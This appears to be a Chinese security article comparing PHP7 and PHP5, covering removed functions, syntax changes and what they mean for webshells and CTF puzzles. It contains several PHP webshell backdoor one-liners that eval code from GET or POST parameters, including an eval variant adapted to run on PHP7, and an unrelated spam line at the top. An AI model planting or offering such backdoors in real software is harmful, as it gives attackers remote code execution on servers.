自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

PHP7和PHP5在安全上的區(qū)別

安全 應(yīng)用安全
之前測試的時(shí)候發(fā)現(xiàn)很多菜刀的馬都不能用了,大馬也幾乎3/4不能正常在php7運(yùn)行。網(wǎng)上百度也沒有找到太多相關(guān)性的文章,就自己總結(jié)測試了一下關(guān)于安全性上的區(qū)別。

前言

之前測試的時(shí)候發(fā)現(xiàn)很多菜刀的馬都不能用了,大馬也幾乎3/4不能正常在php7運(yùn)行。網(wǎng)上百度也沒有找到太多相關(guān)性的文章,就自己總結(jié)測試了一下關(guān)于安全性上的區(qū)別。

函數(shù)修改

1. preg_replace()不再支持/e修飾符

  1. <?php 
  2. preg_replace("/.*/e",$_GET["h"],".");  
  3. ?> 

利用\e修飾符執(zhí)行代碼的后門大家也用了不少了,具體看官方的這段描述:

如果設(shè)置了這個(gè)被棄用的修飾符, preg_replace() 在進(jìn)行了對替換字符串的 后向引用替換之后, 將替換后的字符串作為php 代碼評估執(zhí)行(eval 函數(shù)方式),并使用執(zhí)行結(jié)果 作為實(shí)際參與替換的字符串。單引號(hào)、雙引號(hào)、反斜線()和 NULL 字符在 后向引用替換時(shí)會(huì)被用反斜線轉(zhuǎn)義.

很不幸,在PHP7以上版本不在支持\e修飾符,同時(shí)官方給了我們一個(gè)新的函數(shù)preg_replace_callback:

這里我們稍微改動(dòng)一下就可以利用它當(dāng)我們的后門:

  1. <?php 
  2. preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]); 
  3. ?> 

 

2. create_function()被廢棄

  1. <?php 
  2. $func =create_function('',$_POST['cmd']);$func(); 
  3. ?> 

少了一種可以利用當(dāng)后門的函數(shù),實(shí)際上它是通過執(zhí)行eval實(shí)現(xiàn)的??捎锌蔁o。

3. mysql_*系列全員移除

如果你要在PHP7上面用老版本的mysql_*系列函數(shù)需要你自己去額外裝了,官方不在自帶,現(xiàn)在官方推薦的是mysqli或者pdo_mysql。這是否預(yù)示著未來SQL注入漏洞在PHP上的大幅減少呢~

4. unserialize()增加一個(gè)可選白名單參數(shù)

  1. $data = unserialize($serializedObj1 , ["allowed_classes" => true]); 
  2. $data2 = unserialize($serializedObj2 , ["allowed_classes" => ["MyClass1", "MyClass2"]]);  

其實(shí)就是一個(gè)白名單,如果反序列數(shù)據(jù)里面的類名不在這個(gè)白名單內(nèi),就會(huì)報(bào)錯(cuò)。

像這樣的報(bào)錯(cuò)!

可以是類名也可以是布爾數(shù)據(jù),如果是FALSE就會(huì)將所有的對象都轉(zhuǎn)換為__PHP_Incomplete_Class對象。TRUE是沒有限制的。也可以傳入類名實(shí)現(xiàn)白名單。

還好現(xiàn)在是可選不是必選,要是默認(rèn)FALSE逼程序員弄白名單那就真的吐血了。

5. assert()默認(rèn)不在可以執(zhí)行代碼

這就是眾多馬不能用的罪魁禍?zhǔn)琢耍嗟鸟R用assert()來執(zhí)行代碼了,這個(gè)更新基本就團(tuán)滅,一般情況下修改成eval即可正常運(yùn)行了~

提一下,菜刀在實(shí)現(xiàn)文件管理器的時(shí)候用的恰好也是assert函數(shù),這導(dǎo)致菜刀沒辦法在PHP7上正常運(yùn)行。

語法修改

1. foreach不再改變內(nèi)部數(shù)組指針

  1. <?php 
  2. $a = array('1','2','3'); 
  3. foreach ($a as $k=>&$n){ 
  4.     echo ""; 
  5. print_r($a); 
  6. foreach ($a as $k=>$n){ 
  7.     echo ""; 
  8.  
  9. print_r($a); 

這樣的代碼在php5中,是這樣的執(zhí)行結(jié)果:

因?yàn)閿?shù)組最后一個(gè)元素的 $value 引用在 foreach 循環(huán)之后仍會(huì)保留,在第二個(gè)循環(huán)的時(shí)候?qū)嶋H上是對之前的指針不斷的賦值。php7中通過值遍歷時(shí),操作的值為數(shù)組的副本,不在對后續(xù)操作進(jìn)行影響。

 

這個(gè)改動(dòng)影響了某些cms的洞在PHP7上無法利用了….你知道我指的是哪個(gè)洞的。

這個(gè)問題在PHP7.0.0以后的版本又被改回去了,只影響這一個(gè)版本。

2. 8進(jìn)制字符容錯(cuò)率降低

在php5版本,如果一個(gè)八進(jìn)制字符如果含有無效數(shù)字,該無效數(shù)字將被靜默刪節(jié)。

  1. <?php 
  2. echo octdec( '012999999999999' ) . "\n"; 
  3. echo octdec( '012' ) . "\n"; 
  4. if (octdec( '012999999999999' )==octdec( '012' )){ 
  5.         echo ": )". "\n"; 

比如這樣的代碼在php5中的執(zhí)行結(jié)果如下:

 

但是在php7里面會(huì)觸發(fā)一個(gè)解析錯(cuò)誤。

這個(gè)問題同樣在PHP7.0.0以后的版本又被改回去了,只影響這一個(gè)版本。

3. 十六進(jìn)制字符串不再被認(rèn)為是數(shù)字

這個(gè)修改一出,以后CTF套路會(huì)少很多啊~

很多騷操作都不能用了~

這個(gè)沒什么好說的,大家都懂。

  1. <?php 
  2. var_dump("0x123" == "291"); 
  3. var_dump(is_numeric("0x123")); 
  4. var_dump("0xe" + "0x1"); 
  5. var_dump(substr("foo", "0x1")); 
  6. ?> 

以上代碼在PHP5運(yùn)行結(jié)果如下:

PHP7運(yùn)行結(jié)果如下:

你以為我要說這個(gè)在后續(xù)版本被改回去了?不,目前截至PHP7.3版本依然沒有改回去的征兆,官方稱不會(huì)在改了。這個(gè)講道理還是蠻傷的。

4. 移除了 ASP 和 script PHP 標(biāo)簽

現(xiàn)在只有這樣的標(biāo)簽?zāi)茉趐hp7上運(yùn)行了。

字面意思,影響其實(shí)不是很大(只是以后騷套路會(huì)少一點(diǎn))。

5. 超大浮點(diǎn)數(shù)類型轉(zhuǎn)換截?cái)?/strong>

將浮點(diǎn)數(shù)轉(zhuǎn)換為整數(shù)的時(shí)候,如果浮點(diǎn)數(shù)值太大,導(dǎo)致無法以整數(shù)表達(dá)的情況下, 在PHP5的版本中,轉(zhuǎn)換會(huì)直接將整數(shù)截?cái)?,并不?huì)引發(fā)錯(cuò)誤。 在PHP7中,會(huì)報(bào)錯(cuò)。

CTF又少一個(gè)出題套路,這個(gè)問題我只在CTF上見過,影響應(yīng)該不大。

雜項(xiàng)

  • exec(), system() passthru()函數(shù)對 NULL 增加了保護(hù).
  • list()不再能解開字符串string變量
  • $HTTP_RAW_POST_DATA 被移除
  • __autoload() 方法被廢棄
  • parse_str() 不加第二個(gè)參數(shù)會(huì)直接把字符串導(dǎo)入當(dāng)前的符號(hào)表,如果加了就會(huì)轉(zhuǎn)換稱一個(gè)數(shù)組?,F(xiàn)在是第二個(gè)參數(shù)是強(qiáng)行選項(xiàng)了。
  • 統(tǒng)一不同平臺(tái)下的整型長度
  • session_start() 可以加入一個(gè)數(shù)組覆蓋php.ini的配置

后記

這篇文章將保持長期更新和修正。但是很遺憾FB在發(fā)布之后作者就沒有權(quán)限更改了,因此后續(xù)更新將在博客上發(fā)布。

錯(cuò)誤的地方或者不全的地方請通過bad_guys@qq.com聯(lián)系我。

引用:http://php.net/

 

責(zé)任編輯:趙寧寧 來源: Freebuf
相關(guān)推薦

2009-11-23 20:00:25

PHP5接口PHP5抽象類

2011-07-07 14:28:23

PHP

2009-03-16 16:08:09

PHP異常

2015-09-18 11:29:50

PHP7革新性能

2009-11-24 17:01:39

PHP5多重繼承

2015-10-28 13:30:15

PHP7性能揭秘

2011-03-11 14:02:55

LAMP安裝PHP5

2009-11-18 18:33:23

Linux PHP5安

2009-11-24 16:28:41

PHP5魔術(shù)函數(shù)

2009-12-11 17:33:56

PHP5常用函數(shù)

2009-11-23 13:27:22

PHP5指針

2009-11-17 14:01:01

Apache 2 PH

2009-11-18 14:45:02

PHP5 Sessio

2009-12-03 13:50:16

PHP5異常處理

2009-11-23 19:33:12

PHP5多態(tài)性

2011-12-15 09:00:51

PHP 7

2011-09-07 10:26:28

Ubuntuphp5phpize

2017-09-28 11:54:11

PHP

2009-11-18 10:39:45

PHP5配置

2015-12-03 11:45:31

PHP7 發(fā)布
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)